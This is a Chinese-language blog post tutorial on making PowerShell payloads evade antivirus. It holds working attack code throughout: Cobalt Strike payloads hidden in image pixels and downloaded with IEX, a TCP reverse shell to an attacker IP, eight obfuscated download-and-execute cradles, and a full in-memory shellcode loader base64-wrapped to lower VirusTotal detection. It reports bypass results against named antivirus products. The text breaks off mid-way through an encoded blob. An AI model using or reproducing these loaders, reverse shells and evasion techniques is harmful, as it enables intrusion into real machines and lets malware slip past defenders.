Mamor's Blog
0%

powershell免杀

发表于 更新于 分类于
本文字数: 39k 阅读时长 ≈ 35 分钟


简介

Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。powershell一直都是内网渗透的大热门,微软是真正的在推行PowerShell,包括Office等更多自家软件,底层都是调用PowerShell来实现,近年来利用powershell来搞内网渗透进行横向或免杀的热度一直居高不下.

powershell是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能,PowerShell脚本的文本文件,其文件名需要加上扩展名“.PS1”。PowerShell需要.NET环境 的支持,同时支持.NET对象,其可读性、易用性居所有Shell之首。 PowerShell具有以下特点:

  • 在Windows 7以上的操作系统中是默认安装的。

  • PowerShell脚本可以运行在内存中,不需要写入磁盘。

  • 几乎不会触发杀毒软件。

  • 可以远程执行。

  • 目前很多工具都是基于PowerShell开发的。

  • 使得Windows的脚本攻击变得更加容易。

  • cmd.exe通常会被阻止运行,但是PowerShell不会。

  • 可以用来管理活动目录。

powershell的执行策略问题

1
2
3
4
5
6
7
  Unrestricted 权限最高,可以不受限制执行任意脚本
  Restricted 默认策略,不允许任意脚本的执行
  AllSigned 所有脚本必须经过签名运行
  RemoteSigned 本地脚本无限制,但是对来自网络的脚本必须经过签名
  Bypass 没有任何限制和提示
  Undefined 没有设置脚本的策略
查看powershell的默认策略:Get-ExecutionPolicy

但是在实战中 去修改powershell的执行策略并不太实用,动作太大容易被杀软发现 现在360(win7测试下)也开始禁止调用powershell了...(win7测试下360会拦截powershel 但是在win10下就没.....)

Invoke-PSimage图片混淆powershell代码

参考 https://blog.csdn.net/Hungchuiho/article/details/121436429

https://github.com/peewpw/Invoke-PSImage

以 PNG 文件的像素对 PowerShell 脚本进行编码,并生成要执行的单行线 Invoke-PSImage 采用 PowerShell 脚本,并将脚本的字节编码为 PNG 图像的像素。它生成一个单行线,用于从 Web 的文件执行。 它可以仅使用有效负载数据创建新图像,也可以将有效负载嵌入到现有图像的最低有效字节中,使其看起来像实际图片。图像保存为 PNG,并且可以无损压缩,而不会影响执行有效负载的能力,因为数据存储在颜色本身中。创建新映像时,普通的 PowerShell 脚本实际上会显著压缩,通常会生成文件大小约为原始脚本的 50% 的 png。 使用嵌入方法时,每个像素中 2 个颜色值中最低有效 4 位用于保存有效负载。图像质量将因此受到影响,但它看起来仍然不错。它可以接受大多数图像类型作为输入,但输出将始终为PNG,因为它需要是无损的。图像的每个像素用于容纳一个字节的脚本,因此您需要一个像素至少与脚本中的字节数一样多的图像。这相当容易 - 例如,Invoke-Mimikatz适合1920x1200的图像。

先找一张高像素的123.jpg图片 方便后续写入shellcode

截图


在CS中生成一个powershell的payload

在cmd下执行以下命令即可

1
2
3
Powershell -ExecutionPolicy Bypass
Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -Script .\payload.ps1 -Image .\123.jpg -Out 456.jpg -Web
截图

在import-module时 要关闭杀软 不然会出现拒绝

截图

然后会在当前目录下生成 456.jpg

截图

然后再powershell中会生成一段ps1代码 复制报存到shell.ps1

1
2
sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://example.com/456.jpg"));$o=a Byte[] 5120;(0..1)|%{foreach($x in(0..2559)){$p=$g.GetPixel($x,$_);$o[$_*2560+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3534]))
PS C:\Users\guoyo\Desktop\powershell_bypass学习\Invoke-PSImage-master>


打开CS 使用文件下载模块去下载生成的456.jpg 点击"Launch"会生成一个url

截图
截图

http://10.10.10.114:80/456.jpg

然后将shell.ps1url修改为CS生成的链接

截图

改为ps1文件 shell.ps1

1
sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://10.10.10.114:80/456.jpg"));$o=a Byte[] 5120;(0..1)|%{foreach($x in(0..2559)){$p=$g.GetPixel($x,$_);$o[$_*2560+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3534]))

在本地火绒机器上运行便可成功上线...但是静态查杀shell.ps1会被杀掉,所以可以先进行powershell混淆

截图
截图

腾讯电脑管家查不出,也可以直接上线

Invoke Obfuscation混淆

powershell的免杀⽅法有很多,对代码进⾏编码是最常⻅的⼀种,这⾥介绍⼀个专⻔⽤来对powershell 进⾏编码免杀的框架Invoke Obfuscation,这也是著名的APT32组织海莲花常⽤的⼀个⼯具。 该工具可以对powershell代码进行 ASCII/hex/octal/binary甚至SecureString进行加密混淆

使用Invoke Obfuscation对powerhsell进行混淆 将shell.ps1放到该目录下

1
2
3
Powershell -ExecutionPolicy Bypass
Import-Moudle .\Invoke-Obfuscation.psd1
Invoke-Obfuscation

shell2.ps1

1
2
${3`7j}=  [typE]("{0}{1}" -F'mat','H')  ; ${K8`ZR2J} = [tYPE]("{0}{2}{6}{4}{3}{5}{1}" -F 'Syste','nG','m.','N','t.e','coDI','TEX'); &("{1}{0}" -f'al','s') ('a') ("{0}{1}{2}"-f'New-O','bj','ect');.("{1}{2}{0}" -f 'pe','A','dd-Ty') -A ("{0}{3}{2}{1}" -f 'S','Drawing','em.','yst');${g}=&('a') ("{1}{3}{0}{2}{4}"-f'aw','Syst','ing.Bitma','em.Dr','p')((&('a') ("{3}{2}{1}{0}" -f 'nt','e','WebCli','Net.')).("{2}{0}{1}"-f 'penRea','d','O').Invoke(("{1}{7}{5}{3}{8}{4}{0}{2}{6}" -f'.','http://1','j','4:80','56','.10.10.11','pg','0','/4')));${O}=.('a') ("{0}{1}" -f'By','te[]') 5120;(0..1)|.('%'){foreach(${x} in(0..2559)){${p}=${g}.("{0}{2}{1}" -f 'Ge','Pixel','t').Invoke(${x},${_});${o}[${_}*2560+${x}]=( (ChIlDiTeM  ("{0}{2}{3}{1}"-f 'VaRia','e:37J','b','L') )."vaL`Ue"::("{0}{1}"-f 'Fl','oor').Invoke((${P}."B"-band15)*16)-bor(${P}."g" -band 15))}};.("{0}{1}"-f'I','EX')(  ( gci  ('V'+'ar'+'Iab'+'LE:k8ZR'+'2J') )."VA`LUe"::"ASC`iI"."GEt`s`TRi`Ng"(${o}[0..3534]))

静态查杀效果

混淆前

截图

混淆后

截图
截图
截图

也可以过360的静态查杀(但是现在360禁止调用powershell 所以...)

上传到VT上查看混淆后的效果

https://www.virustotal.com/gui/file/03e35a1c21bd99766c6f7729c59df32340b2f88ecf834236c143584fc2390d9e?nocache=1

截图

动态查杀效果

截图

火绒 腾讯管家都可以正常上线 不过360禁止调用powershell 没发成功利用...

Powershell socket免杀

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Set-Variable -Name client -Value (New-Object System.Net.Sockets.TCPClient("10.10.10.114", 53));

Set-Variable -Name stream -Value($client.GetStream());

[byte[]]$bytes = 0..65535 | % { 0 };

while ((Set-Variable -Name i -Value($stream.Read($bytes, 0, $bytes.Length))) -ne 0)
{
  Set-Variable -Name data -Value ((New-Object -TypeNameSystem.Text.ASCIIEncoding).GetString($bytes, 0, $i));
  Set-Variable -Name sendback -Value (iex $data 2>&1 | Out-String );
  Set-Variable -Name sendback2 -Value ($sendback + "PS " + (pwd).Path + "> ");
  Set-Variable -Name sendbyte -Value (([text.encoding]::ASCII).GetBytes($sendback2));
  $stream.Write($sendbyte, 0,$sendbyte.Length);
  $stream.Flush()
}
$client.Close()

使用Invoke Obfuscation 混淆后

1
2
Set-Variable -Name client -Value (New-Object System.Net.Sockets.TCPClient("10.10.10.114", 53));
&('sV') ("{0}{1}" -f 'p','w4c') ( [tYPE]("{1}{3}{2}{0}"-f 'nG','TE',("{1}{2}{0}" -f'i','En','cOd'),'Xt.') ) ;&("{0}{2}{1}{3}"-f("{0}{1}" -f'Set','-'),'b',("{1}{0}"-f'aria','V'),'le') -Value (${C`L`IEnT}.("{1}{2}{0}" -f 'am',("{0}{1}" -f'G','etS'),'tre')."i`N`VoKe"()) -Name ("{0}{1}{2}" -f 's',("{0}{1}"-f'tr','ea'),'m');[byte[]]${b`Yt`es} =0..65535|&('%'){0};while((.("{0}{2}{3}{1}"-f'S',("{0}{1}" -f'i','able'),'et',("{0}{1}" -f '-','Var')) -Name ('i') -Value(${s`T`Ream}.("{0}{1}"-f'Rea','d')."IN`Voke"(${b`Y`TES}, 0,${By`Tes}."LeNg`TH"))) -ne 0){;&("{2}{0}{1}" -f'Va',("{0}{1}"-f 'ria','ble'),("{1}{0}"-f 't-','Se')) -Name ("{1}{0}"-f'ta','da') -Value ((&("{2}{1}{0}" -f 'ect',("{0}{1}"-f'w-','Obj'),'Ne') -TypeName ("{4}{2}{1}{0}{5}{3}" -f'IEn','I',("{1}{0}{2}" -f'.','xt','ASC'),("{1}{0}"-f'ding','o'),("{1}{2}{0}" -f'e','Sys','tem.T'),'c'))."g`e`TSTRiNg"(${bYT`Es},0, ${I}));.("{1}{2}{0}{3}"-f'i','Se',("{1}{0}"-f'r','t-Va'),("{1}{0}"-f 'ble','a')) -Value (.("{0}{1}"-f'ie','x') ${D`ATA} 2>&1 | .("{1}{2}{0}"-f'g','Ou',("{0}{1}"-f't-Stri','n')) ) -Name("{0}{1}" -f ("{1}{2}{0}"-f'c','se','ndba'),'k');.("{0}{3}{1}{2}" -f'Se',("{0}{1}"-f 'Va','riabl'),'e','t-') -Value (${sE`NDBack} + "PS " + (.("{0}{1}" -f'p','wd'))."P`ATH" + "> ") -Name ("{0}{1}"-f'se',("{0}{2}{1}"-f'n','ack2','db'));&("{1}{2}{3}{0}"-f 'le',("{0}{1}"-f 'Set-','Va'),'ri','ab') -Name("{1}{0}"-f ("{0}{1}"-f'ndbyt','e'),'se') -Value (( ( .("{0}{1}" -f'i','tEm') ("{4}{2}{1}{0}{3}"-f'W4','Ble:p','IA','C','vaR'))."vAL`UE"::"Asc`II").("{0}{1}" -f("{0}{1}"-f 'Get','By'),'tes')."in`VOKE"(${SEN`D`BAck2}));${str`eam}.("{0}{1}" -f'Wri','te')."InV`OKE"(${S`en`D`BYTE},0,${SeN`D`ByTe}."lE`NGtH");${ST`R`EaM}.("{0}{1}" -f ("{0}{1}"-f'F','lus'),'h')."IN`V`oKe"()};${cl`I`eNT}.("{0}{1}" -f'C',("{0}{1}"-f'los','e'))."I`N`Voke"()

在目标机器上运行

1
2
Powershell -ExecutionPolicy Bypass
.\11.ps1

在kali上进行监听 nc -lvvp 53

截图

火绒不拦截

在win7虚拟机下 360不拦截

截图

但是现在360已经拦截了powershell 只要开启360(在win7下会拦截,但是在win10测试时没拦截) 就无法去调用powershell


PS1源文件命令混淆(行为免杀)

尽管powershell代码自身免杀,但是在通过powershell远程下载或者执行shellcode时,很容易被杀软发现拦截

常用的powershell去执行命令

1
2
3
powershell -NoExit "IEX(New-Object Net.WebClient).DownloadString.(''http://10.10.10.114/shell.ps1''))"

powershell -NoExit "Invoke-Expression (New-Object Net.WebClient)."D o wn l oad Str in g"('h'+'ttp://127.0.0.1:8000/1.txt')"


截图
截图

杀软便会对齐进行拦截

通常情况下 可以通过替换函数进行bypass

Invoke-Expression (New-Object System.Net.WebClient).DownloadString("http://127.0.0.1:8000/1.txt")

powershell -NoExit "IEX(New-Object Net.WebClient).DownloadString.(''http://10.10.10.114/shell.ps1''))"


截图


  • 1.去掉System关键词
1
Invoke-Expression (New-Object Net.WebClient).DownloadString("http://10.10.10.114:8000/1.txt")
  • 2.使用字符串连接+号连接
1
Invoke-Expression (New-Object Net.WebClient).DownloadString('h'+'ttp://10.10.10.114:8000/1.txt')
  • 3.使用Invoke方法
1
Invoke-Expression (New-Object Net.WebClient).("DownloadString").Invoke('h'+'ttp://10.10.10.114:8000/1.txt')
  • 4.变量替代
1
2
$ds="Down"+"loadString";
Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('h'+'ttp://10.10.10.114:8000/1.txt')
  • 5.关键词使用单双引号引起来
1
Invoke-Expression (New-Object Net.WebClient)."DownloadString"('h'+'ttp://10.10.10.114/powershell')
  • 6.转义符号
1
Invoke-Expression (New-Object Net.WebClient)."D o wn l oad Str in g"('h'+'ttp://10.10.10.114:8000/1.txt')
  • 7.字符串反转
1
2
$re= ")'txt.1/0008:411.01.01.01//:ptth'(gnirtSdaolnwoD.)tneilCbeW.teN tcejbO-weN(";
($re[-1..-($re.Length)] -Join '') | IEX
  • 8.编码执行
1
2
3
4
$command = "Invoke-Expression (New-Object Net.WebClient).DownloadString('h'+'ttp://10.10.10.114:8000/1.txt')"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -EncodedCommand $encodedCommand
截图

混淆之后不会被火绒拦截

截图

混淆后腾讯管家也可以绕过

base64编码powershell+随机分段+垃圾注释

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
Set-StrictMode -Version 2

$Dolt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckt3PCMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMT2R3diMWbAJzBmNic3gXf3N5exYXC3N9ChRgYAoUXgdmamBicQ5wd2JtZ2JxZw5ibXdqdWpxdnAOd2Zwdw5lam9mAgdrCGsJIxZsAnMGI3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwtATE5TQldKQU9GGANucGpmAxoNExgDdEpNR0xUUANtdwMVDRIYA3dRSkdGTVcMFg0TCi4pIxZsAnMGY2JzeBd/c3l7FhcLc30KFGBgChReB2ZqYGJxDnB3Ym1nYnFnDmJtd2p1anF2cA53ZnB3DmVqb2YCB2sIawkjFmwCcwZjYnN4F39zeXsWFwtzfQoUYGAKFF4HZmpgYnEOcHdibWdicWcOYm13anVqcXZwDndmcHcOZWpvZgIHawhrCSMWbAJzBmNic3gXf3N5exYXC3N9ChRgYAoUXgdmamBicQ5wd2JtZ2JxZw5ibXdqdWpxdnAOd2Zwdw5lam9mAgdrCGsJIxZsAnMGY2JzeBd/c3l7FhcLc30KFCNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEhMNEhMNEhMNEhIXIyMjIyM=')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $Dolt  | wait-job | Receive-Job
}
else {
	IEX $Dolt  
}

这是cs生成原始的powershell payload

这里把 $Dolt @‘’@ 里面的内容进行base64 然后再使用一个变量去base64解码,再更改一下变量名 即可绕过火绒、360

1
2
3
4
5
6
7
8
9
10
11
12
13
Set-StrictMode -Version 2

$AAA = @'
ZnVuY3Rpb24gZnVuY19nZXRfcHJvY19hZGRyZXNzIHsKCVBhcmFtICgkdmFyX21vZHVsZSwgJHZhcl9wcm9jZWR1cmUpCQkKCSR2YXJfdW5zYWZlX25hdGl2ZV9tZXRob2RzID0gKFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKSB8IFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uRXF1YWxzKCdTeXN0ZW0uZGxsJykgfSkuR2V0VHlwZSgnTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMnKQoJJHZhcl9ncGEgPSAkdmFyX3Vuc2FmZV9uYXRpdmVfbWV0aG9kcy5HZXRNZXRob2QoJ0dldFByb2NBZGRyZXNzJywgW1R5cGVbXV0gQCgnU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZicsICdzdHJpbmcnKSkKCXJldHVybiAkdmFyX2dwYS5JbnZva2UoJG51bGwsIEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdKE5ldy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZigoTmV3LU9iamVjdCBJbnRQdHIpLCAoJHZhcl91bnNhZmVfbmF0aXZlX21ldGhvZHMuR2V0TWV0aG9kKCdHZXRNb2R1bGVIYW5kbGUnKSkuSW52b2tlKCRudWxsLCBAKCR2YXJfbW9kdWxlKSkpKSwgJHZhcl9wcm9jZWR1cmUpKQp9CgpmdW5jdGlvbiBmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIHsKCVBhcmFtICgKCQlbUGFyYW1ldGVyKFBvc2l0aW9uID0gMCwgTWFuZGF0b3J5ID0gJFRydWUpXSBbVHlwZVtdXSAkdmFyX3BhcmFtZXRlcnMsCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEpXSBbVHlwZV0gJHZhcl9yZXR1cm5fdHlwZSA9IFtWb2lkXQoJKQoKCSR2YXJfdHlwZV9idWlsZGVyID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgnUmVmbGVjdGVkRGVsZWdhdGUnKSksIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgnSW5NZW1vcnlNb2R1bGUnLCAkZmFsc2UpLkRlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLCBBdXRvQ2xhc3MnLCBbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSkKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZUNvbnN0cnVjdG9yKCdSVFNwZWNpYWxOYW1lLCBIaWRlQnlTaWcsIFB1YmxpYycsIFtTeXN0ZW0uUmVmbGVjdGlvbi5DYWxsaW5nQ29udmVudGlvbnNdOjpTdGFuZGFyZCwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZU1ldGhvZCgnSW52b2tlJywgJ1B1YmxpYywgSGlkZUJ5U2lnLCBOZXdTbG90LCBWaXJ0dWFsJywgJHZhcl9yZXR1cm5fdHlwZSwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCglyZXR1cm4gJHZhcl90eXBlX2J1aWxkZXIuQ3JlYXRlVHlwZSgpCn0KCltCeXRlW11dJHZhcl9jb2RlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMzh1cUl5TWpRNnJHRXZGSHFIRVRxSEV2cUhFM3FGRUxMSlJwQlJMY0V1T1BIMEpmSVE4RDR1d3VJdVRCMDNGMHFIRXpxR0VmSXZPb1kxdW00MWRwSXZOenFHczdxSHNESXZEQUgycW9GNmdpOVJMY0V1T1A0dXd1SXVRYncxYlhJRjdiR0Y0SFZzRjdxSHNISXZCRnFDOW9xSHMvSXZDb0o2Z2k4NnBuQndkNGVFSjZlWExjdzN0OGVhZ3h5S1YrUzAxR1Z5TkxWRXBOU25kTGIxUUZKTnoyRXR4MGRIUjBkRXNaZFZxRTNQYktweU1qSTNnUzZuSnlTU0J5Y2t0M1BDTWpjSE5MZEtxODVkejJ5Rk40RXZGeFN5TWhZNmR4Y1hGd2NYTkx5SFlOR056MnF1V2c0SE1TM0hSMFNkeHdkVXNPSlR0WTNQYW00eXluNENJakl4TGNwdFZYSjZyYXlDcExpZWJCZnR6MnF1SkxaZ0o5RXR6MkV0eDBTU1J5ZFhOTGxIVERLTnoybkNNTUl5TWE1RmVVRXR6S3NpSWpJOHJxSWlNank2amMzTndNVDJSM2RpTVdiQUp6Qm1OaWMzZ1hmM041ZXhZWEMzTjlDaFJnWUFvVVhnZG1hbUJpY1E1d2QySnRaMkp4Wnc1aWJYZHFkV3B4ZG5BT2QyWndkdzVsYW05bUFnZHJDR3NKSXhac0FuTUdJM1pRUmxFT1lrUkdUVmNaQTI1TVdVcFBUMElNRmcwVEF3dEFURTVUUWxkS1FVOUdHQU51Y0dwbUF4b05FeGdEZEVwTlIweFVVQU50ZHdNVkRSSVlBM2RSU2tkR1RWY01GZzBUQ2k0cEl4WnNBbk1HWTJKemVCZC9jM2w3RmhjTGMzMEtGR0JnQ2hSZUIyWnFZR0p4RG5CM1ltMW5ZbkZuRG1KdGQycDFhbkYyY0E1M1puQjNEbVZxYjJZQ0Iyc0lhd2tqRm13Q2N3WmpZbk40RjM5emVYc1dGd3R6ZlFvVVlHQUtGRjRIWm1wZ1luRU9jSGRpYldkaWNXY09ZbTEzYW5WcWNYWndEbmRtY0hjT1pXcHZaZ0lIYXdockNTTVdiQUp6Qm1OaWMzZ1hmM041ZXhZWEMzTjlDaFJnWUFvVVhnZG1hbUJpY1E1d2QySnRaMkp4Wnc1aWJYZHFkV3B4ZG5BT2QyWndkdzVsYW05bUFnZHJDR3NKSXhac0FuTUdZMkp6ZUJkL2MzbDdGaGNMYzMwS0ZDTkwwNWFCZGR6MlNXTkxJek1qSTBzakkyTWpkRXQ3aDNERzNQYXdtaU1qSXlNaStuSndxc1IwU3lNREl5TndkVXN4dGFyQjNQYW00MWZscUNRaTRLYmpWc1o3NE11SzN0emNFaE1ORWhNTkVoTU5FaElYSXlNakl5TT0nKQoKZm9yICgkeCA9IDA7ICR4IC1sdCAkdmFyX2NvZGUuQ291bnQ7ICR4KyspIHsKCSR2YXJfY29kZVskeF0gPSAkdmFyX2NvZGVbJHhdIC1ieG9yIDM1Cn0KCiR2YXJfdmEgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZnVuY19nZXRfcHJvY19hZGRyZXNzIGtlcm5lbDMyLmRsbCBWaXJ0dWFsQWxsb2MpLCAoZnVuY19nZXRfZGVsZWdhdGVfdHlwZSBAKFtJbnRQdHJdLCBbVUludDMyXSwgW1VJbnQzMl0sIFtVSW50MzJdKSAoW0ludFB0cl0pKSkKJHZhcl9idWZmZXIgPSAkdmFyX3ZhLkludm9rZShbSW50UHRyXTo6WmVybywgJHZhcl9jb2RlLkxlbmd0aCwgMHgzMDAwLCAweDQwKQpbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCR2YXJfY29kZSwgMCwgJHZhcl9idWZmZXIsICR2YXJfY29kZS5sZW5ndGgpCgokdmFyX3J1bm1lID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIoJHZhcl9idWZmZXIsIChmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIEAoW0ludFB0cl0pIChbVm9pZF0pKSkKJHZhcl9ydW5tZS5JbnZva2UoW0ludFB0cl06Olplcm8p
'@

$bbb= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($AAA))
If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $bbb | wait-job | Receive-Job
}
else {
	IEX $bbb  
}
截图
截图

上传到VT

截图

发现查杀率还是较高,然后可以差分一些上面的$AAA变量

接下来将$AAA变量就随便分成4部分 然后再拼接起来看看VT上的效果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Set-StrictMode -Version 2

$AAA = @'
ZnVuY3Rpb24gZnVuY19nZXRfcHJvY19hZGRyZXNzIHsKCVBhcmFtICgkdmFyX21vZHVsZSwgJHZhcl9wcm9jZWR1cmUpCQkKCSR2YXJfdW5zYWZlX25hdGl2ZV9tZXRob2RzID0gKFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKSB8IFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uRXF1YWxzKCdTeXN0ZW0uZGxsJykgfSkuR2V0VHlwZSgnTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMnKQoJJHZhcl9ncGEgPSAkdmFyX3Vuc2FmZV9uYXRpdmVfbWV0aG9kcy5HZXRNZXRob2QoJ0dldFByb2NBZGRyZXNzJywgW1R5cGVbXV0gQCgnU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZicsICdzdHJpbmcnKSkKCXJldHVybiAkdmFyX2dwYS5JbnZva2UoJG51bGwsIEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdKE5ldy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZigoTmV3LU9iamVjdCBJbnRQdHIpLCAoJHZhcl91bnNhZmVfbmF0aXZlX21ldGhvZHMuR2V0TWV0aG9kKCdHZXRNb2R1bGVIYW5kbGUnKSkuSW52b2tlKCRudWxsLCBAKCR2YXJfbW9kdWxlKSkpKSwgJHZhcl9wcm9jZWR1cmUpKQp9CgpmdW5jdGlvbiBmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIHsKCVBhcmFtICgKCQlbUGFyYW1ldGVyKFBvc2l0aW9uID0gMCwgTWFuZGF0b3J5ID0gJFRydWUpXSBbVHlwZVtdXSAkdmFyX3BhcmFtZXRlcnMsCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEpXSBbVHlwZV0gJHZhcl9yZXR1cm5fdHlwZSA9IFtWb2lkXQoJKQoKCSR2YXJfdHlwZV9idWlsZGVyID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgnUmVmbGVjdGVkRGVsZWdhdGUnKSksIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgnSW5NZW1